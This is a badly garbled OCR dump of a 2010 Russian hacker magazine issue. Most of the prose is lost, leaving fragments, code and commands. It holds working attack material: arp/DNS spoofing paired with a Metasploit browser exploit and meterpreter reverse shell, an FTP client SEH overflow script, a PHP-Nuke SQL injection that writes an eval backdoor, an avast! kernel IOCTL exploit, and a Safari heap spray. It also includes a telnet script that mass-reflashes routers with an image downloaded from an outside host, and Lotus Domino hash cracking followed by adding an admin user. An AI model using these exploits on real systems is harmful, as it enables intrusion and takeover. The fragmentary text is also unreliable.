IM- ,
. (
, macos)
, ,
IM- ( ).
039
PC_ZONE
!

OTR

SOCKS5 (127.0.0.1:1080) HTTP-
(127.0.0.1:8080).

ICQ- OTR, Proxy
.
ICQ-
,

.
,

( OTR fingerprint)

uin-fingerprint .
fingerprint
, ,
, . , ,
, . ICQ OTR, .

, , ,
.
, ,
.
,

.
040
OTR .
Pidgin' ,
Miranda quitIM ,
Mac' IM- Adium
.
OTR
, Miranda
SecureIM,
AES192, GPG/PGP.
, Miranda GPG/
PGP ,
GnuPG Plugin (addons.miranda-im.org/details.
php?action=viewfile&id=3485).
,
.
JABBER & PGP

, ,
,

. ,
XMPP (Jabber).
, XMPP
SSL/TLS- , .
, , , PGP/
GPG.
PGP GnuPG, .

XMPP- psi (www.psiim.org).
GnuPG Pidgin
.
GnuPG
FireGPG,
,
Jabber'.

gpg --gen-key.
,
, (
OTR-
), ,
, e-mail,
. ,
.
gpg --list-keys

. ,
,
: gpg --armor --export ID_ >
mykey_gpg.asc. mykey_gpg.asc
- :
pub 1024D/29D59819 06.06.2010
myaccount's key (myaccount's key)
<myaccount@Gmail.com>
Primary key fingerprint:
586C 0FAB 3F0C 0009 40C6 273E
8885 6A80 29D5 9819
-----BEGIN PGP PUBLIC KEY BLOCK---Version: GnuPG v1.4.9 (MingW32) WinPT 1.4.3
Charset: UTF-8
mQGiBEwLWjwRBACT9pHfYBDC51cxwsIWuO
5DE7xKBz/NscI05q7j+DaVl0PoXLko
[]
D1cedORKLsgnRfbfkIMAn2BDxiBT2hPvEn
AFjHOpIWra8axQ
=l7zo
-----END PGP PUBLIC KEY BLOCK-----
- ,
.

, GUI-
WinPT (winpt.gnupt.de),
10
. ? . Psi
,
GnuPG (, -
).
,
OpenPGP
.

. , X 07 /138/ 10
PGP/GPG-
GTalk-
GPG-
SILC
, ,
, - .

Psi,
OpenPGP. WinPK .
, Psi
,
, .
, , ,
.
, , .

. X 07 /138/ 10
SILC Secure
Internet Live Conferencing (silcnet.org). SILC
IRC: , , .
, ,
, ,
IRC. IRC .
,
. : , , . SILC IRC,
( , )

. ,
, ,
. , .
,
detaching: , . IRC
- BNC :).
SILC ,
,
Linux/Unix/Mac/Windows.
Pidgin . ( ./configure&make&make install)
rpm- (rpm i silc-server-1.1-0.
fc8.i386.rpm). , , ,
:
HTTP://WWW
links

OTR:
www.cypherpunks.ca/
otr/otr-codecon.pdf
WARNING
warning

.
,
,
.

.
silcd -C /etc/silcd
--identifier="UN=<username>, HN=<hostname
or IP>, RN=<real name>, E=<email>,
O=<organization>, C=<country>"
, ,
Pidgin',
SILC.
, ,
IP ,
. ,
. ... ,
IRC, . z
041

GreenDog agrrrdog@gmail.com
Easy Hack
1
: -
:
Hack In The Box 2010 Dubai ,
Laurent Oudot,
web. conference.hitb.org/
hitbsecconf2010dxb/materials.
,
, . ,
web-hack, . , , .

. ,
( , ),
.
, , , . 100%
. ,
, , . , -
: PCAP-
:
, ,
, - . ,
, , ,
..
pcap, . tcpreplay.
(, ) pcap-
, - ,
. tcpreplay.synfin.net/wiki/Download,
*nix-. Win ,
.
. , test.pcap
- , :
:
COOKIE
:
, -
, .
, .
, - , ( -). ,
042
, POST (, ,
), ,
, GET-.
- :).
, . -, , User-Agent
Referer, . , ,
, ,
. -,
, .
GET- , , . -,
base64, , - , , - IDS.
-, ,
, , . ,
, ,
, . , , -
web-.
lanmap i eth0
lanmap eth0. lanmap.png. ,

BackTrack. tcpreplay
pcap- .
tcpreplay --intf1=eth0 test.pcap
pcap-. ,
eth0 ,
. lo. .
, pcap-.
, IP MAC-, ,
- . ...
, .
. ,
. ,
. , .
, .
open-labs.org/ob-session04.tar.gz ( ).
, :
perl getcookie.pl http://example.com USERID 100 > test1.txt
getcookie.pl ;
X 07 /138/ 10
http://example.com
-; USERID
, test1.txt,
; 100

.

:
perl ob-session.pl < test1.txt

, , ..
, -
fuzzer,
.
, ob-session.pl ,
.
PHP- ()
:
.
- Windows, ,
, , , , , . .
Metasploit.
. ,
,
, ,
, . ,
, .
dns-spoofing. DNS-. ,
DNS-,
IP-.
IP- .
arp-spoofing,
, DNS-.
arp-spoofing , .
arpspoof -i eth0 192.168.0.1,
192.168.0.1 IP , MAC .
echo 1 > /proc/sys/net/ipv4/ip_forward
.
X 07 /138/ 10
DNS-spoofing. Metasploit fake dns, ,

Digininja, : digininja.
org/metasploit/dns_dhcp.php ( ). ,
, dns.
txt, DNS.
.
:
1.
2. dns_mitm auxiliary/server metasploite
lib dhcp_exhaustion, .
msfconsole.
use
set
set
run
auxiliary/server/dns_mitm/dns_mitm
FILENAME /msf3/modules/auxiliary/server/dns.txt
REALDNS 192.168.0.1
-j
, :
dns.txt IP DNS- .
, Windows ,
Metaspoit, MSF Cygwine. ,
C .
dns.txt :
192.168.0.1 google.ru
192.168.0.1 IP , google.com ,
, .
, .
DNS- . ,
:
043
nslookup digininja.reload 192.168.0.101
192.168.0.101 IP DNS, digininja.reload

dns.txt ( RELOAD MSF).
. .
. meterpreter. , .
.
use exploit/windows/browser/ms10_002_aurora
: GOOGLE-
-
:
Google ( ) , ,
.
.

.
, , .
ghh.sourceforge.net , ,
. , ,
:
1. ;
2. config.php ,
, htdocs ( Apache);
3. , readme.txt, -
htdocs;
set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 4444
set LHOST 192.168.0.101
set SRVPORT 80
set URIPATH /
exploit
-, . google.ru, ,
.
4. config.php ;
5. RegisterGlobals php.ini, ;
6. -
, , : <a href=http://example.com/
honeypot.php>.</a>, ;
7. index.php config.php
, .
. , .
, , -
, . ,
, - ,
.
, MySQL XMLRPC,
.
,
, ,
hackersforcharity.org/ghdb/.
, .. ,
Google Hacking for Penetration Testers by Johnny Long.
044
X 07 /138/ 10
:
, , . . ,
php glype-
, , .
: /
][
. Olly Debugger
. ,
. Immunity Debugger. , ,
Ollydbg 1.10.
Pythona , .
1.73 ( 1.74 -
- ). ,
, Python . .
Peter Van Eeckhoutte aka corelanc0d3r
ImmunityDbg pvefindaddr.
, www.corelan.be:8800/index.php/security/pvefindaddrpy-immunity-debugger-pycommand. 1.32.
:
1. pvefindaddr.py;
2. ImmunityDbg PyCommands.
ImmunityDbg.
!pvefindaddr, (L)oga .
, . .
:
!pvefindaddr j esp user32.dll
jmp, call, push+ret .. user32.dll j.txt.
, ,
example.com:22, 22 . , ,
couldnt connect to host, , .
www2.de.com/index.php.
, , ,
. , -
, ,
sensepost.co.za/labs/tools/pentest/glype. , glype- , GHDB.
offset
.

ActiveX

][ . ESP

ComRaider.
Metasploit.
!pvefindaddr pattern_create 500
SubmintToExpress
arg1="Aa0Aa1AAq3Aq4Aq5Aq"
. ESI 37694136, SEH 6B41316B.

:
!pvefindaddr pattern_offset 37694136 500
!pvefindaddr pattern_offset 6B41316B 500
ESI 260 , SEH 304.

ASLR DEPa:
!pvefindaddr noaslr
dll, ,
. , ,
. z
offset pvefindaddr
X 07 /138/ 10
045

, Digital Security dookie@inbox.ru

,
, ,
. - .
, , , ,
.
. , , :
MKD c:\zloba
257 "c:\zloba" directory created
, ,
. .
SOLUTION
. WFTPD FTP.
, .
02
RUMBA
FTP CLIENT
CVE
N/A
01
WFTPD SERVER
CVE
N/A
TARGETS]
* Rumba FTP Client 4.2
BRIEF
, FTP-,
FTP-.
.
TARGETS
*WFTPD Server 3.30
BRIEF
WFTPD Server FTP- Windows (, ).
. FTP-
Cisco, HTC, Serv-U .

.
EXPLOIT
FTP- , , . ,
. ,
../ .
EXPLOIT
FTP-,
, . , , - (
, ,
$pasvip) , . , SEH-
. ,
, SEH-, .
-, . :
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto
MKD ../../../../../ZLOBA
550 You do not have rights to create that subdirectory.
046
=> 'tcp', Listen => '1' )

or die "Socket Not Created $!\n";
X 07 /138/ 10
FTP-, .
# ,
if (/LIST/i) {
print
print $data "150 Here comes the directory listing.\r\n"
"################################################\n"
."#
Rumba ftp Client 4.2 PASV BoF (SEH)
."#
By: zombiefx
."#
#\n"
. "226 Directory send OK.\r\n";
#\n"
Listening on port 21 with pasv port of 31337
&senddata( '122', '105' );
#\n"
."################################################\n";
}
}
print "Payload delivered check the client!\n";
# IP
my $pasvip = "127,0,0,1";
#
while ( my $data = $sock->accept() ) {
print "Client Connected!\nAwaiting Ftp commands: \n";

print $data "220 Gangsta Rap Made Me Do It\r\n";
sub senddata {
my $port
= $_[0] * 256 + $_[1];
#
my $pasvsock = IO::Socket::INET->new( LocalPort =>
# FTP
$port, Proto => 'tcp', Listen => '1' );
while (<$data>) {
my $pasvdata = $pasvsock->accept();
print;
print $data "331 Anonymous access allowed\r\n" if (/
# 1351
my $junk
USER/i);
print $data "230-Welcome to N0 M4Ns l4nd.\r\n230 User
= "\x77" x 1351;
# SEH- 0x1006E534
# ftplogic.dll ,
logged in.\r\n" if (/PASS/i);

print $data "215 UNIX Type: L8 \r\n" if (/SYST/i);
#POP EDI/POP ESI/RETN
print $data "257 \"/\" is current directory.\r\n" if (/
#
my $seh = pack( 'V', 0x1006E534 );# located in ftplogic.
PWD/i);
print $data "200 Type set to I.\r\n"
if (/TYPE I/i);
dll
print $data "200 Type set to A.\r\n"
if (/TYPE A/i);
# JMP +0x8,
print $data "214 Syntax: SITE - (site-specific commands)\

r\n"
if (/HELP/i);
#
print $data "227 Entering Passive Mode ($pasvip,122,105)\
r\n"
#
my $nseh = "\xeb\x06\x90\x90";
#, NOP - :
my $nops = "\x90" x 50;
my $calcshell = /* */;
if (/PASV/i);
X 07 /138/ 10
047
, .
? , , .
:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site>
PHP-Nuke -
, cookie:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site> -c user=MjphZG1pbjo1ZjRkY2MzYjV
hYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6ND
A5Ng==
.
my $payload = $junk . $nseh . $seh . $nops . $calcshell;
print $pasvdata
"-rw-rw-r--
1 1176
1176
1060 Apr 23 23:17

, .. .
, .
, ,
referer:
test.$payload\r\n\r\n";
REFERER: '=(select if(true,sleep(10),0) from nuke_

authors limit 1))-- 1
, , , DEP
.
SOLUTION
, , .
...
03

PHPNUKE
CVE
N/A
TARGETS
* PHP-Nuke 7.0
* PHP-Nuke 8.1
* PHP-Nuke 8.1.35
BRIEF
PHP-Nuke . ,
. (Michael Brooks) , , LFI, SQL-,
, , .
, , phpBB, PHP-Nuke 7.0.
PHP
, - ,

-, .
EXPLOIT
, , . ,
, . PHP-Nuke
048
cookie ,
, ,
LFI-. , , ( )
.
, AppArmor
Ubuntu.
:
print "Uploading backdoor...\n";
$remote_path=addslashes(addslashes($remote_path."\\
frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_
GET["e"])):eval($_GET["e"])';
$http->postdata="chng_uid=".urlencode("' union/**/
select ".$sex->charEncode("<?php").",'".$backdoor."',".$
sex->charEncode("?>").
",'','','','','','','','','','','','','','','' into
outfile '".$remote_path."'-- 1");
$re=$http->send($attack_url."/admin.php?op=modifyUser");
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$
values[1]."&xslogan=".$values[2]."&xstartdate=".$value
s[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_
editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
charEncode () char()
MySQL. , .
:
$http->postdata="xDefault_Theme=../../../../../../../../
../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url."/admin.php");
/tmp AppArmor.
X 07 /138/ 10
mov

Safari.
SOLUTION
, PHP-Nuke, , , .
04
AVAST!
CVE
CVE-2008-1625
TARGETS
* avast! 4.7 Professional Edition
* avast! 4.7 Home Edition
BRIEF
(Matteo Memelli) Offensive-Security
avast!. , (Tobias Klein), ,
IOCTL-.
, ,
. , .
EXPLOIT
, , ,
:). aavmker4.sys. , IOCTL , , IOCTL
0xb2d60030, :
mov
ecx, 21Ah ;
mov
edi, [eax+18h] ; EAX+0x18 ,

rep movsd ; EDI,
,
.
-,
. , EAX
.
X 07 /138/ 10
eax, [ebp+v38_uc]
, .
, ,
, EAX+0x18
.
.data, IOCTL- 0xb2d6001c. ,
, IOCTL 0xb2d60030,
,
.data . IOCTL 0xb2d60020. ,
syscall.
:
lsas1 = "echo hola | runas /user:administrator cmd.exe
> NUL"
lsas2 = "net use \\\\127.0.0.1 /user:administrator
test > NUL"
. . .
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
- - . 4444, .
:
#, ,
# IOCTL-
read_data_from= struct.pack('L', sysbase+0x2e04)
# , , NOP
r0_address
= struct.pack('L', sysbase+0x23fa)
#
#
# IOCTL 0xb2d6003
# -, NOP,
evil_input
= r0_address*2 + "\x90"*0x102
#- , ring3
4444
evil_input += ring0_migrate + ring0_msr + ring3_
stager + ring3_shellcode
#
evil_input += "\x41"*0x549
# .data ,
# IOCTL
evil_input += read_data_from + "\x42\x42\x42\x42"
# ,
.data
#c IOCTL-.
# IOCTL
#
stor_input
= "\x43\x43\x43\x43"
# , ,
# IOCTL
stor_input += "\x07\xAD\xDE\xD0" # cmp dword ptr
[eax], 0D0DEAD07h
stor_input += "\xBA\xD0\xBA\x10" # cmp dword ptr
[eax+4], 10BAD0BAh
#
stor_input += "\x44\x44\x44\x44"*2
049
, .
# nt!KeSetEvent,
#,

#
stor_input += read_data_from
#
stor_input += "\x44\x44\x44\x44"
# 0x2300
# ,
# IOCTL
#
#
stor_input += struct.pack('L', sysbase+0x2300) + "\
x45"*414
.
, IOCTL-. read_data_from, stor_input.
- read_data_from, evil_input.
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d6001c, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d60030,
evil_input, evil_size, evil_
output,
evil_size,
byref(dwReturn2), None)
050
50
IOCTL- 0xb2d60020
syscall c lsass.exe. , - , lsass.exe .
SOLUTION
4.8
.
05

APPLE SAFARI
CVE
N/A
TARGETS
* Apple Safari <= 4.0.5
BRIEF
0day Safari.
(Krystian Kloskowski) . Apple .
EXPLOIT
HTML- c
JavaScript-. parent.close(),
,
-.
- , ,
- . ,
.
window.
X 07 /138/ 10
open(), HTML .
, . ,
close() ,
prompt()
. parent- ,
Safari ,
,
prompt()
ESI ,
.

CALL ESI.
close()
prompt(), ESI
0x40E00000. -,
0x40E00000.
heap
spray, ,
0x40E00000, -.
, ,
, prompt(),
ALT+F4,
, ,
pwned close()
,
prompt().
:
, permanent-DEP.
, - ,
DEP ASLR. ,
VUPEN
(, ROP),
ASLR ( ),
JIT-SPRAY
,
(
:)). .
, heap spray
(, , ) JIT-SPRAY. ,
. -
,
parent.close() ,
Flash, .
.
JIT-SPRAY
,
, . , heap
spray. Safari
, .
0x40E00000 ,
JIT SPRAY ][, ,
0xXXYY0101, JIT-.
,
, ESI ,
parent().
var buf = make_
buf(unescape('%u0101%u0943'),
38000);

. 0x09430101.
. .
SOLUTION
.
JavaScript- Pop-Up (
Safari ). z
//
function make_buf(payload, len) {
while(payload.length < (
len * 2)) payload += payload;
payload = payload.substring(
0, len);
return payload;
}
var shellcode = // -
/* heap spray */
var a = parent; //
var buf = make_buf("AAAA", 10000);
//
for(var i = 0; i <= 1; i++) { //,
a.prompt(alert);
a.prompt(buf);
a.close();
}
, Safari
permanent-DEP,
. VUPEN
X 07 /138/ 10
051

HellMilitia and my Death
D-LINK 500T
, ! ADSL-
.

. ,
, .
IQ
, ,
GNU\Linux,

.
Windows ( Cygwin, ), .

( ).
...
- . , ,
, ,
.
, (, -
:)), Web- , ,
telnet ssh.
(
, , admin:admin). ,
SSH, !
$ ssh admin@192.168.1.1
$ Password:
! BusyBox! ,
, GNU/Linux!
, , ,
, .
052
, ? , :
# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod,
chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod,
kill, ln, login, ls, lsmod, mkdir, modprobe,
mount, mv, passwd, ping, ps, pwd, reboot,
rm, rmmod, route, sh, sleep, sync, tar,
test, tftp, touch, true, tty, umount, wget,
whoami, yes
,
. :
# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy)
(gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00
CST 2006
: MontaVista , .
.
X 07 /138/ 10
FTP-
adam2
, ,
.
:
# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
processor
cpu model
BogoMIPS
wait instruction
microsecond timers
extra interrupt vector
hardware watchpoint
VCED exceptions
VCEI exceptions
:
:
:
:
:
:
:
:
:
0
MIPS 4KEc V4.8
149.91
no
yes
yes
yes
not available
not available
AR7 ,
TexasInstruments. ADSL-
, ADSL1, ADSL2,ADSL2+.
RISC MIPS 4KEc,
175 233 ( : 18
13 ). 2 UART-,
(UART_A) ,
EJTAG-, () Flash-.
.
:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat
dev:
mtd0:
mtd1:
mtd2:
/proc/mtd
size
erasesize name
0034f000 00010000 "mtd0"
00090f70 00010000 "mtd1"
00010000 00002000 "mtd2"
X 07 /138/ 10
- AR7
mtd3: 00010000 00010000 "mtd3"

mtd4: 003e0000 00010000 "mtd4"
, :
# cat /proc/ticfg/env | grep mtd
mtd0
0x900a1000,0x903f0000
mtd1
0x90010090,0x900a1000
mtd2
0x90000000,0x90010000
mtd3
0x903f0000,0x90400000
mtd4
0x90010000,0x903f0000
, Flash- (/dev/mtdblock)
5 :
mtd0 SquashFs.
, . gzip, LZMA
( ). 4 .
mtd1 MontaVista LZMA
, 600 .
mtd2 Bootloader ADAM2, , FTP- .
. 64 .
mtd3 environment ( ) , /proc/ticfg/
env. /etc/config.xml.
( cm_*, , ) cm_logic.
64 .
mtd4 , .
Web-. ,
, ,
.
( 16 , ADAM2
14 , ), /var,
:
# free
total
Mem:
used
14276
free
10452
shared
3824
buffers
0
.
: thttpd Web-server; dproxy, DNS
proxy server; ddnsd DNS daemon; pppd...
daemon, PPP, -
053
, POST- Web-
, Flash-, .
,
.
D-Link ( , GNU/
Linux) GPL,
FTP-.
, ( T-).
, ,
toolchain / .
PATH
bin- toolchain`a:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/<toolchain_path>
, ,
make.
Nmap

. ,
( bridge),
.
cm_*
(
TexasInstruments, D-Link
).
cm_logic ,
; /etc/config.
xml /dev/ticfg (
mtd3).
cm_cli
. ,
.
cm_pc , (, ,
) /etc/progdefs.xml;
.
webcm CGI-, , /etc/
shadow, URL.
http://192.168.1.1/../../../etc/shadow
$ cd DSL/TYLinuxV3/src && make

( ).
TYLinuxV3/images .
, /
TYLinuxV3/src/scripts.
.
,
SSH, scp.
, mc (Midnight Commander) SSH (Panel Shell connection). ,
Web- FTP-. Web-, . thttpd,
, .
, /var (,
, ).
$ thttpd -g -d ~/ForRouter -u user -p 8080

# cd /var
# wget http://192.168.1.2/file
, web-:
# thttpd -g -d /var -u root -p 8080
, ,
.
mc, /var ,
. , ,
, .
, , HelloWorld.
- . :
, thttpd , :
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
. ,
ssh/telnet, Web-.
firmwarecfg Web-.
054
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
X 07 /138/ 10
JTAG
JTAG
return 0;
}
( toolchain'
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell
<name>hell</name>
<path>/bin/hell</
name>
</program>
JTAG-
$ mksquashfs unpacked_fs my_fs.img -noappend
, /var,
:
# cd /var
# chmod +x hell
# ./hell
... , path
not found. ? cm_pc
, /etc/progdefs.xml.
.
, ,
. ,
SquashFs LZMA. mksquashfs (
), unsquashfs ( ) .
, ,
. LZMA-
, . :
,
.
- , , - grep,
whoami,
UPX.
.
,
/dev/mtdblock/*. ,

:
# cat my_fs.img > /dev/mtdblock/0 && reboot
# cp my_fs.img /dev/mtdblock/0 && reboot
, ,
, .
:
HTTP://WWW
links
,
MIPS ADAM-:
ftp.dlink.ru/pub/
ADSL/GPL_source_
code/
sensi.org/%7Ealec/
mips/adam2_app.tgz
langens.eu/tim/ea/
mips_en.php
mrc.uidaho.edu/
mrc/people/jff/digital/
MIPSir.html
mips.com/products/
processors/hard-ipcores/4kec-hard-ipcores/
routertech.org5
# cat /dev/mtdblock/0 > /var/fs.img
.
, :
# hell
Mate.Feed.Kill.Repeat.
! . .
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
,
FuckTheWorld /bin /etc/progdefs.xml.
$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
( <progdefs></progdefs>):
<program>
X 07 /138/ 10
,
, .
. ADAM2
FTP-. FTP-
IP- ADAM2, /proc/ticfg/
env ( my_ipaddress).
reset,
.
$ ftp 192.168.1.199
055
UART-
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.
, FTP:
ftp> debug
/ adam2/adam2. .
FTP :
ftp> bin
Flash- :
ftp> quote MEDIA FLSH
, ,
:
ftp> put fs.img "fs.img mtd0"
, , :
ftp> quote REBOOT
ftp> quit
! , , - ,
.
, IP-, ( reset' )
.
, FTP
ADAM2: GETENV SETENV ( ). FTP :
ftp>
ftp>
ftp>
ftp>
ftp>
SETENV autoload,1
SETENV autoload_timeout,8
SETENV my_ipaddress,192.168.1.1
quote REBOOT
quit
ADAM2 192.168.1.1:21.
, , FTP .
.
, /proc/ticfg/env,
FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
:
# cat /proc/ticfg/env | grep my_ipaddress
, ,
? -
056
UART-
, ADAM2? JTAG, ,
EJTAG ( ).
\.
LPT- , 4 . .
, JTAG ,
.
, .
JTAG ,
UrJTAG. . :
jtag> cable parallel 0x378 DLC5
jtag> detect
Flash-:
jtag> detectflash 0x30000000 1
Flash-:
jtag> readmem 0x30000000 0x400000 fullflash.img
():
jtag> flashmem 0x30000000 adam2.img
UART- ( ). UART_A , (
) .
. UART Universal
Asynchronous Receiver/Transmitter (
) .
. TTL: MAX232 COM FT232R
USB.
.
( COM-) 20 .
, .
? USB-
, UART USB.
X 07 /138/ 10
Webcm
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.write("reboot")
telnet.close()

progdefs.xml vim.
\ . , ,
.
Windows, :). .
?
, /.
DDOS- .
/ , mtd-
, !
,
. ,
/ ... . , ,
Flash- ( ), .
! Qemu AR7! ,
?
- !
. , 1-2 , , ,
10- ,
"cat" "mtd".
. python.
:
, , nmap;
IP-,
telnet \;
: ,
, .
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")
X 07 /138/ 10
, ,
. /
, . ,

, ,
. ,
/ ,
. , ,
, ,
RDP .
.
Windows,
( )
, .
: ,
, ... , .
.
, : ? , , . ( 8 ),
(hex-, , , ), nmap
.
, .
progdefs.xml. telnet ( , , ),
firewall,
IP- MAC-. firewall
, .
.
, D-Link- AR7, Acorp, NetGear, Linksys, Actionec...

AR7 MontaVista. , ,
toolchain, , .
: / ( , , ). , , , / ...
USB 1.1-,
. USB- ,
Flash-
. ,
, ! z
057

sh2kerr dsecrg.ru
LOTUS DOMINO
. Oracle
,
Lotus Domino. Domino - ,
, , LDAP, , .
IBM Lotus Domino Server Lotus,

,
.
: , HTTP- .
HTTP-,
.
Lotus Domino 8.5.1
Windows.
058
, Web- Lotus (Lotus

Domino httpd) Nmap
:
Nmap sV 172.212.13.0.24 p 80
Nmap scan report for 172.212.13.13
Host is up (0.017s latency).
Not shown: 65533 filtered ports
X 07 /138/ 10
Lotus
Domino
PORT
80/tcp
STATE SERVICE VERSION

open http
Lotus Domino httpd
,
Lotus, . ,
, Lotus Domino httpd,
: http://servername/homepage.nsf.
, ,
, , .
Google Hack
Lotus- ,
inurl:homepage.nsf.

Lotus. ,
,

,
.
, .
Lotus-
,
. ,

,
. ,
?
.NSF
, Lotus nsf.

. , nsf

. , nsf-
, ,
.
nsf-,
:
/names.nsf
/admin4.nsf
/admin.nsf
/alog.nsf
/domlog.nsf
/catalog.nsf
X 07 /138/ 10
/certlog.nsf
/dba4.nsf
/homepage.nsf
/log.nsf
, , , dominohunter,
nsf-. , ,
names.nsf.

,
, :
, Lotus
Notes . , ?
!

, ,
. .
1. ,
. ,
, , ,
.
2. ,
,
, ,
.
3. , names.nsf

Lotus Notes, .
0-
. , IE (
) PDF ,
Lotus Notes,
ActiveX- ( , inotes.
dll xforce.iss.net/xforce/xfdb/11339),
.
WARNING
warning
!

!
,

!

, names.nsf.
2005
,
.
059
Live console

Webadmin.nsf

.
. Hidden HTTPPassword
dspHTTPPassword ( ),
, ,
. ,
!

, .
, .
2007 raptor_dominohash,
, ,
DominoHashBreaker, .
,
,
. ,
,
,
. ,
JohnTheRipper jumbo,
,
, DominoHashBreaker.
, , Lotus :
1. (32 HEX) :
ActiveX
:
:
.
.
:
:
<input name="$dspPasswordDigest" type="hidden"
="F05389C37C850260F278FED23334C172">
value
2. C (22
G) :
<input name="$dspHTTPPassword" type="hidden"
value="(GFmjA4YmP9C05vHn09gI)">

JohnTheRipper HASH.txt :
./john HASH.txt --format=lotus5

JohnTheRipper HASH2.txt :
:()
:()
.
.
:()
060
X 07 /138/ 10
HTTP://WWW
links
dsecrg.ru/pages/
pub/

names nsf
./john HASH.txt --format=dominosec
, , ,
. , ,
Domino ,
Lotus Domino Web-.
, ,
- ,
.
, , ( , :))
.

nsf-, , , . log.nsf,

, , . catalog.
nsf. ,
/mail/.nsf.

webadmin.nsf (servername/webadmin.nsf). Web- Lotus Domino
. , ,
,

.
Lotus Domino ,
, : ( ) (
). , Windows

Local System, Local
System, Unix .
, webadmin.nsf?

,
.
: Quick Console
Live Console. - .
, ,
LOTUS.
, -
X 07 /138/ 10
, , Load
,
. ,
PATH
Load (
, IBM Lotus Notes/
Domino R7, , Lotus).
.
LIVE CONSOLE

Live Console, , , .
,
,
.

2050,
.
, ,
.
QUICK CONSOLE

Quick Console.
, ,
.
, ,

.
Blind SQL Injection, , .
cybsec.com/vuln/
default_configuration_
information_disclosure_lotus_domino.
pdf
Lotus Domono.
exploit-db.com/
exploits/3302

.
securiteinfo.com/
download/dhb.zip

Domino Hash Breaker.
openwall.com/
john/
JohnTheRipper
.
openwall.com/
john/contrib/john1.7.5-jumbo-2.diff.gz

JohnTheRipper

Domino
.
documents.iss.net/
whitepapers/domino.
pdf IBM ISS Lotus
Domino Security 2002
seclists.org/pentest/2008/May/64
Pentesting Lotus
Domino.
,
, ,
. ,
Files, ,
, , . ,
.
.nsf.
,

,
, .nsf.
061

.
(
):
load cmd /c "dir /D /B > sh2kerr.out"
load cmd /c "FOR /F "delims= " %i IN (sh2kerr.out) DO
ECHO > C:\lotus\domino\sh2kerr\"%i".nsf"
(
DIR) sh2kerr.out.
.
C:\lotus\domino\sh2kerr\ ,
.
, , , .
,
. , ,
Web-.
6.5 8.5 ( , ,
, ). Windows
:
C:\Lotus\Domino\data\domino\html\download\filesets\
, Web, : http://
servername/download/filesets. Lotus.
.
Load . Server->
Status->Schedules->Programs. ,
.
Web- Lotus Domino, (NRPC 1352 ),

.
Lotus Domino , Lotus Designer (), Lotus Notes ( )
Lotus Administrator (, ).
, Lotus Domino
ID.
.
062

ID-, . , ,
, 2 : ID- . ,
Web, .
, ID-, Lotus Domino.
ID- ,
, . ,
names.nsf, .
ID-
names.nsf. , Web-, ID-.
, ?
. ID-, , ,
, , 3-
(smashingpasswords.com/3-best-lotus-notes-password-recovery-freesoftwares), (IPR) .
STEP BY STEP HOWTO
, Lotus Domino.
:
Web-:
1. raptor_dominohash :
./raptor_dominohash 192.168.0.202
2. , ;
3. JohnTheRipper :
./john HASH.txt --format=lotus5
4.
Web- :
http://servername/webadmin.nsf
5. Quick Console ,
:
load cmd /c net user hacker iamstupid /add
6. , , :
load cmd /c net user > C:\Lotus\Domino\data\domino\html\download\
filesets\1.txt

:
http://servername/download/filesets/1.txt , , ,
;
7. , Program.
NRPC-:
1. names.nsf ( ) ID;
2. ID
;
3. Lotus
Administrator, 5 .

Lotus
Domino. , : ID-,
nsf- xss Web-,
, ,
.
, , DSecRG.ru, ,
, (research@dsec.ru). z
X 07 /138/ 10

Positive Technologies
MOD_REWRITE

...
, MOD_REWRITE
C , ,
Apache mod_rewrite.
- ,
SQL Injection, Cross-Site Scripting ..
, , fingerprint-
. , mod_rewrite
, ,
. , , ,
!
064
X 07 /138/ 10
Mod_rewrite URL . -
Apache .
:
(SEO);
, ;
, -
;
: mod_rewrite
HTTP-, COOKIE
( )
.
mod_rewrite -.
:
1. URL. , http://www.example.com/main/
search/stroka_poiska, , URL
-;
,
. -.
/main/ -,
search=stroka_poiska
RewriteRule ^(.+)/(.+)$ script.php?act=$1&value=$2

script.php, main
act=search&value=stroka_poiska
RewriteRule ^(.+)/(.+)/(.+)$
$1.php?value1=$2&value2=$3

main.php, -
value1=search&value2=stroka_poiska
